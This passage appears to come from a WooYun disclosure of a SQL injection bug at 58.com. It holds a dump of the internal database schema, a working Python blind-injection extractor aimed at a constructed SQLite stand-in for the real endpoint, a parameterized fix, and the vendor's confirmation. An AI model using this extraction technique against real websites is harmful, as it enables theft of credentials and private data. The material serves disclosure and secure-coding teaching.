priceAudit t_2s_ipodprice_audit modify_date
priceAudit t_2s_ipodprice_audit newPrice
priceAudit t_2s_ipodprice_audit state
priceAudit t_2s_pbprice_audit id
priceAudit t_2s_pbprice_audit brand_id
priceAudit t_2s_pbprice_audit model_id
priceAudit t_2s_pbprice_audit quality_id
priceAudit t_2s_pbprice_audit ipad_mem_id
priceAudit t_2s_pbprice_audit ipad_ver_id
priceAudit t_2s_pbprice_audit ipad_wf_id
priceAudit t_2s_pbprice_audit minprice
priceAudit t_2s_pbprice_audit maxprice
priceAudit t_2s_pbprice_audit price
priceAudit t_2s_pbprice_audit modify_date
priceAudit t_2s_pbprice_audit newPrice
priceAudit t_2s_pbprice_audit fraudminprice
priceAudit t_2s_pbprice_audit fraudmaxprice
priceAudit t_2s_pbprice_audit state
priceAudit t_2s_sjprice_audit id
priceAudit t_2s_sjprice_audit brand_id
priceAudit t_2s_sjprice_audit model_id
priceAudit t_2s_sjprice_audit quality_id
priceAudit t_2s_sjprice_audit iphone_mem_id
priceAudit t_2s_sjprice_audit iphone_ver_id
priceAudit t_2s_sjprice_audit minprice
priceAudit t_2s_sjprice_audit maxprice
priceAudit t_2s_sjprice_audit price
priceAudit t_2s_sjprice_audit modify_date
priceAudit t_2s_sjprice_audit newPrice
priceAudit t_2s_sjprice_audit fraudminprice
priceAudit t_2s_sjprice_audit fraudmaxprice
priceAudit t_2s_sjprice_audit state
priceAudit t_2s_xjprice_audit id
priceAudit t_2s_xjprice_audit brand_id
priceAudit t_2s_xjprice_audit model_id
priceAudit t_2s_xjprice_audit quality_id
priceAudit t_2s_xjprice_audit dfxj_id
priceAudit t_2s_xjprice_audit minprice
priceAudit t_2s_xjprice_audit maxprice
priceAudit t_2s_xjprice_audit price
priceAudit t_2s_xjprice_audit modify_date
priceAudit t_2s_xjprice_audit newPrice
priceAudit t_2s_xjprice_audit state
priceAudit t_2s_yxjprice_audit id
priceAudit t_2s_yxjprice_audit brand_id
priceAudit t_2s_yxjprice_audit model_id
priceAudit t_2s_yxjprice_audit quality_id
priceAudit t_2s_yxjprice_audit yxj_ver_id
priceAudit t_2s_yxjprice_audit minprice
priceAudit t_2s_yxjprice_audit maxprice
priceAudit t_2s_yxjprice_audit price
priceAudit t_2s_yxjprice_audit modify_date
priceAudit t_2s_yxjprice_audit newPrice
priceAudit t_2s_yxjprice_audit state
priceAudit t_hangqing_audit ID
priceAudit t_hangqing_audit FactoryID
priceAudit t_hangqing_audit BrandID
priceAudit t_hangqing_audit SeriesID
priceAudit t_hangqing_audit ModelID
priceAudit t_hangqing_audit MadeYear
priceAudit t_hangqing_audit MinPrice
priceAudit t_hangqing_audit MaxPrice
priceAudit t_hangqing_audit CreateYear
priceAudit t_hangqing_audit CreateMonth
priceAudit t_hangqing_audit CreateTime
priceAudit t_hangqing_audit LevelID
priceAudit t_hangqing_audit LocalID
priceAudit t_hangqing_audit NewMinPrice
priceAudit t_hangqing_audit NewMaxPrice
priceAudit t_hangqing_audit GuidePrice
priceAudit t_hangqing_audit Displacement
priceAudit t_hangqing_audit state
qiche cyinfo id
qiche cyinfo userId
qiche cyinfo onlinecount
qiche cyinfo newlinecount
qiche cyinfo updatelinecount
qiche cyinfo deletelinecount
qiche cyinfo unpassedcount
qiche cyinfo todaypv
qiche cyinfo time
qiche promotionInfo id
qiche promotionInfo userId
qiche promotionInfo infoId
qiche promotionInfo cityId
qiche promotionInfo createTime
qiche promotionInfo updateTime
qiche promotionInfo beginTime
qiche promotionInfo endTime
qiche promotionInfo time
qiche promotionInfo todayPV
qiche promotionInfo PV
qiche promotionInfo state
qiche refreshInfo id
qiche refreshInfo userId
qiche refreshInfo infoId
qiche refreshInfo cityId
qiche refreshInfo refreshType
qiche refreshInfo count
qiche refreshInfo time
qiche user id
qiche user userId
qiche user cityId
qiche user comName
qiche user cityName
qiche user buyProductId
qiche user beginTime
qiche user endTime
qiche user PV
qiche user state
quanwang quanwangresult content
quanwang quanwangresult score
quanwang u_infoactivelog LogID
quanwang u_infoactivelog InfoID
quanwang u_infoactivelog ActiveType
quanwang u_infoactivelog ActiveTime
quanwang u_infoactivelog Remark
quanwang u_infoactivelog AdminName
quanwang u_infoactivelog AdminID
quanwang u_infoactivelog SystemType
quanwang u_infoactivelog CateID
quanwang u_infoactivelog OpTime
quanwang u_infoactivelog UserID
siteStat Busine_DispCate busineID
siteStat Busine_DispCate busineName
siteStat Busine_DispCate state
siteStat Busine_DispCate rules
siteStat Busine_DispCate rulesType
siteStat Busine_DispCate pID
siteStat Busine_DispCate fullPaths
siteStat Busine_DispCate Depth
siteStat Busine_DispCate_20120910 busineID
siteStat Busine_DispCate_20120910 busineName
siteStat Busine_DispCate_20120910 state
siteStat Busine_DispCate_20120910 rules
siteStat Busine_DispCate_20120910 rulesType
siteStat Busine_DispCate_20120910 pID
siteStat Busine_DispCate_20120910 fullPaths
siteStat Busine_DispCate_20120910 Depth
siteStat Dim_Cate_Grade cateid
siteStat Dim_Cate_Grade catename
siteStat Dim_Cate_Grade pid
siteStat Dim_Cate_Grade pname
siteStat Dim_Topcate cate
siteStat Dim_Topcate catename
siteStat Fact_Weight_Change datadate
siteStat Fact_Weight_Change cate
siteStat Fact_Weight_Change change_type
siteStat Fact_Weight_Change source
siteStat Fact_Weight_Change info_count
siteStat Fact_Weight_Change info_count_distinct
siteStat Fact_Weight_Change user_count
siteStat Fact_Weight_Change user_count_distinct
siteStat Search_In_Topcate datadate
siteStat Search_In_Topcate cate
siteStat Search_In_Topcate search_num
siteStat Search_In_Topcate search_jump
siteStat Search_In_Topcate other_cate
siteStat Search_In_Topcate other_area
siteStat Search_In_Topcate see_detail
siteStat Search_In_Topcate see_detail_num
siteStat etl_log datadate
siteStat etl_log table_name
siteStat etl_log flag
siteStat etl_log etl_start_time
siteStat etl_log etl_end_date
siteStat infoResults ID
siteStat infoResults bCateID
siteStat infoResults sCateID
siteStat infoResults bCityID
siteStat infoResults allInfoCount
siteStat infoResults agentInfoCount
siteStat infoResults personInfoCount
siteStat infoResults agentNewInfoCount
siteStat infoResults personNewInfoCount
siteStat infoResults newInfoCount
siteStat infoResults agentRefreshInfoCount
siteStat infoResults personRefreshInfoCount
siteStat infoResults refreshInfoCount
siteStat infoResults agentUpdateInfoCount
siteStat infoResults personUpdateInfoCount
siteStat infoResults updateInfoCount
siteStat infoResults delInfoCount
siteStat infoResults crawlCount
siteStat infoResults agentCrawlCount
siteStat infoResults personCrawlCount
siteStat infoResults allUserCount
siteStat infoResults agentUserCount
siteStat infoResults personUserCount
siteStat infoResults addTimes
siteStat infoResults wapCount
siteStat infoResults manualCheckCount
siteStat infoResults automaticCheckCount
siteStat infoResults automaticNoCheckCount
siteStat list_analytics lis_cate
siteStat list_analytics lis_city
siteStat list_analytics lis_date
siteStat list_analytics lis_type
siteStat list_analytics lis_pv
siteStat list_analytics lis_visit_result
siteStat list_analytics lis_fruitless
siteStat list_analytics lis_less_result
siteStat list_analytics lis_exit
siteStat list_analytics lis_bounce
siteStat list_analytics lis_time_dwell
siteStat m58_log_all_pv Id
siteStat m58_log_all_pv DataDate
siteStat m58_log_all_pv ListPV
siteStat m58_log_all_pv ListErrorPV
siteStat m58_log_all_pv DetailPV
siteStat m58_log_all_pv DetailErrorPV
siteStat m58_log_all_pv SouPV
siteStat m58_log_all_pv SouErrorPV
siteStat m58_log_all_pv Uv
siteStat recruit_Category ID
siteStat recruit_Category PID
siteStat recruit_Category Name
siteStat recruit_Category PY
siteStat recruit_Category FullPath
siteStat recruit_Category SortID
siteStat recruit_Category Depth
siteStat recruit_Category IsOpen
siteStat recruit_Category Level
siteStat recruit_Category Type
siteStat stat_Category CateID
siteStat stat_Category CateName
siteStat stat_Category Depth
siteStat stat_Category DirName
siteStat stat_Category PID
siteStat stat_Category FullPath
siteStat stat_C FullDirName
siteStat stat_Category FullCateName
siteStat stat_DispCategory DispCategoryID
siteStat stat_DispCategory CateID
siteStat stat_DispCategory CateName
siteStat stat_DispCategory Depth
siteStat stat_DispCategory ListName
siteStat stat_DispCategory Order
siteStat stat_DispCategory PID
siteStat stat_DispCategory IsVisible
siteStat stat_DispCategory FullPath
siteStat stat_DispCategory FullListName
siteStat stat_DispCategory FullCateName
siteStat stat_DispLocal DispLocalID
siteStat stat_DispLocal LocalID
siteStat stat_DispLocal LocalName
siteStat stat_DispLocal ListName
siteStat stat_DispLocal PID
siteStat stat_DispLocal Depth
siteStat stat_DispLocal Order
siteStat stat_DispLocal Type
siteStat stat_DispLocal IsVisible
siteStat stat_DispLocal FullPath
siteStat stat_DispLocal FullLocalName
siteStat stat_DispLocal FullListName
siteStat stat_Local LocalID
siteStat stat_Local LocalName
siteStat stat_Local DirName
siteStat stat_Local PID
siteStat stat_Local Depth
siteStat stat_Local FullPath
siteStat stat_Local FullLocalName
siteStat stat_Local FullDirName
siteStat yewu_Category CateID
siteStat yewu_Category CateName
siteStat yewu_Category Depth
siteStat yewu_Category PID
siteStat yewu_Category FullPath
test Busine_DispCate busineID
test Busine_DispCate busineName
test Busine_DispCate state
test Busine_DispCate rules
test Busine_DispCate rulesType
test Busine_DispCate pID
test Busine_DispCate fullPaths
test Busine_DispCate Depth
zhanlve_analysis im_sta_view datadate
zhanlve_analysis im_sta_view target_desc
zhanlve_analysis im_sta_view target
zhanlve_analysis im_sta_view target_value

Fix recommendation:

You're the professionals.
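The report leaves the fix to the vendor, so here is an added, self-contained illustration (not code from the report or from 58.com) of the two halves of this finding: how a boolean-based blind injection in a numeric parameter of a request like queryhqChart.html?price=8.68&carlibid=269276&localid=1&madeyear=2008 lets an attacker walk the schema one character at a time, and what the parameterized version of the same query looks like. Everything about the backend is an assumption: the real engine is unknown (SQLite in memory stands in for it), the carprice and admin_user tables, their columns and rows are constructed, and the exact injection payloads are illustrative rather than the ones used in the report.

```python
import sqlite3

# Constructed stand-in for the backend of queryhqChart.html. The table and
# column names and the stored rows are assumptions made for this example.
SCHEMA = """
CREATE TABLE carprice (carlibid INTEGER, localid INTEGER, madeyear INTEGER, price REAL);
CREATE TABLE admin_user (name TEXT, pwd TEXT);
INSERT INTO carprice VALUES (269276, 1, 2008, 8.68), (269276, 1, 2009, 9.2), (100001, 2, 2008, 5.5);
INSERT INTO admin_user VALUES ('admin', 's3cret');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def query_vulnerable(conn, carlibid, localid, madeyear):
    """Request parameters pasted straight into the SQL text (the assumed bug)."""
    sql = ("SELECT price FROM carprice WHERE carlibid=%s AND localid=%s "
           "AND madeyear=%s" % (carlibid, localid, madeyear))
    return conn.execute(sql).fetchall()


def query_hardened(conn, carlibid, localid, madeyear):
    """Same query with each value validated as an integer and then bound."""
    params = tuple(int(v) for v in (carlibid, localid, madeyear))  # ValueError on junk
    sql = ("SELECT price FROM carprice WHERE carlibid=? AND localid=? "
           "AND madeyear=?")
    return conn.execute(sql, params).fetchall()


def blind_extract(conn, query_fn, subquery, max_len=32):
    """Boolean-based blind extraction of the scalar returned by `subquery`.

    Each probe appends a condition to the madeyear value of a request that
    normally returns one row; a non-empty result means the condition held.
    Characters are assumed to be printable ASCII (32..126).
    """
    def holds(cond):
        return bool(query_fn(conn, 269276, 1, "2008 AND (%s)" % cond))

    out = ""
    for pos in range(1, max_len + 1):
        if not holds("length((%s))>=%d" % (subquery, pos)):
            break  # past the end of the string
        lo, hi = 32, 126  # binary search on the code point of character `pos`
        while lo <= hi:
            mid = (lo + hi) // 2
            if holds("unicode(substr((%s),%d,1))>%d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid - 1
        out += chr(lo)
    return out


def demo():
    conn = make_db()
    # Enumerate another table name, the kind of schema walk behind the dump above.
    table = blind_extract(conn, query_vulnerable,
                          "SELECT name FROM sqlite_master WHERE type='table' "
                          "AND name<>'carprice'")
    secret = blind_extract(conn, query_vulnerable, "SELECT pwd FROM admin_user")
    # The hardened query never lets the payload reach SQL: int() rejects it.
    try:
        query_hardened(conn, 269276, 1, "2008 AND 1=1")
        hardened_blocked = False
    except ValueError:
        hardened_blocked = True
    return table, secret, hardened_blocked


if __name__ == "__main__":
    print(demo())
```

The point of the contrast is that the hardened version does not try to filter the payload; it refuses anything that is not an integer and passes the remaining values as bound parameters, so the SQL text is fixed regardless of input. Against a real engine the schema walk targets its catalog (information_schema, sysobjects and the like) instead of sqlite_master, and each character costs roughly seven requests, which is why the report calls the blind approach slow.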

Copyright notice: when reposting, please credit the source 工作专用@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed at: 2013-04-16 14:35

Vendor reply:

Confirmed as a SQL injection vulnerability. Thanks to all the white hats for reporting it; please keep reporting 58's vulnerabilities.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-04-16 17:37 | xsser Certified white hat ( Regular white hat | Rank:254 Vulns:17 | When I look back on it all, will this world be alright?)

    The vendor is pretty great

  2. 2013-04-17 09:27 | 工作专用 ( Intern white hat | Rank:77 Vulns:6 | What name should I pick?)

    @xsser Just arrived ~!~ Everyone below, line up and welcome me!

  3. 2013-04-18 17:08 | lucky ( Regular white hat | Rank:409 Vulns:81 | Among any three people there is one I can learn from ########################...)

    Could it be bro 8K

  4. 2013-05-17 16:35 | perhaps ( Intern white hat | Rank:70 Vulns:4 )

    This table dump really did a number on my 216 of memory.